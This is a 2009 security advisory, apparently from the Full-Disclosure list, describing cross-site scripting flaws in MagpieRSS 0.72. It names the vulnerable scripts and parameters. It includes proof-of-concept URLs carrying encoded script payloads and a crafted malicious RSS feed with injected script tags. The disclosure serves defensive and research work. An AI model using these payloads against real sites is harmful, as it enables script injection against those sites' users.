-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -= MagpieRSS Multiple XSS Vulnerabilities =-

May 6, 2009
Author: Justin C. Klein Keane <justin@madirish.net>
Software:  MagpieRSS (http://magpierss.sourceforge.net/)
Version Tested:  magpierss-0.72
Vendor notified
Full details can also be found at
http://lampsecurity.org/magpierss-vulnerability


MagpieRSS (http://magpierss.sourceforge.net/) is a PHP based RSS reader.
 "MagpieRSS is compatible with RSS 0.9 through RSS 1.0. Also parses RSS
1.0's modules, RSS 2.0, and Atom. (with a few exceptions)."  Magpie
suffers from multiple cross site scripting (XSS) vulnerabilities.  The
first class of vulnerability is due to the failure to sanitize URL
variables in scripts included with the MagpieRSS distribution.
Specifically the $url variable is crafted from $_GET['url'] and used in
display to users in:

magpierss-0.72/scripts/magpie_simple.php
magpierss-0.72/scripts/magpie_debug.php

The file magpierss-0.72/scripts/magpie_slashbox.php uses the same $url
variable, but cast from $_GET['rss_url'].

The second class of XSS results from MagpieRSS' failure to sanitize any
of the RSS feeds it draws using magpierss-0.72/rss_fetch.inc.  This
could result in cross site scripting vulnerabilities being injected by
malicious RSS feeds.

- -=Proof of concept=-

The following links can be used to trigger XSS in Magpie's sample scripts:

http://192.168.0.2site/magpierss-0.72/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script
http://192.168.0.2/magpierss-0.72/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script

The following malicious RSS feed can be used to exploit Magpie's RSS
rendering:

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xml:base="http://justin.madirish.net"
xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
 <title>Justin.MadIrish.net &lt;script>alert('xss title');&lt;/script>-
Justin&#039;s Personal Homepage</title>
 <link>http://justin.madirish.net</link>
 <description>Close personal friends with Evil Eve.</description>
 <language>en</language>

<item>
 <title>Disturbing&lt;script>alert('xss title');&lt;/script>
XSS<script>alert('xss title');</script></title>
 <link>http://justin.madirish.net/node/343 &lt;script>alert('xss
link');&lt;/script></link>
 <description>foobar</description>
 <pubDate>Wed, 04 Mar 2009 13:42:09 +0000</pubDate>
 <dc:creator>justin</dc:creator>
 <guid isPermaLink="false">343 at http://justin.madirish.net</guid>

</item>
</channel>
</rss>

- --
Justin C. Klein Keane
http://www.MadIrish.net
http://www.LAMPSecurity.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQD1AwUBSgRhSZEpbGy7DdYAAQKdYQcAqeMh+Xb0tNPOtaNo7cZx/ephiLSwsjYs
ij8noyk1W3ONThKYiGqju9z6493DKhAWSDbXEqkFmZCVquSwYaPNIsCUbza1wC0i
iy01RJPCcjB2jzfj4lCXNaDrzK3SZnsBlRS3jK5AYo3C9/msLA/wiSmpkltVvXxI
G7AIVFOxNVHmhyKtj+jJC0Wv+IoNj1RstKZ3kkEe1RnZsZ5ntv+gxsEkVr/Z7eiM
EmxzZwDvKMHCnuhgMG0ZcZGMcB+DEjLw5keKAvlXojEottZIESoynp4rsF0SVE4G
M5uacRMg93U=
=sY6i
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/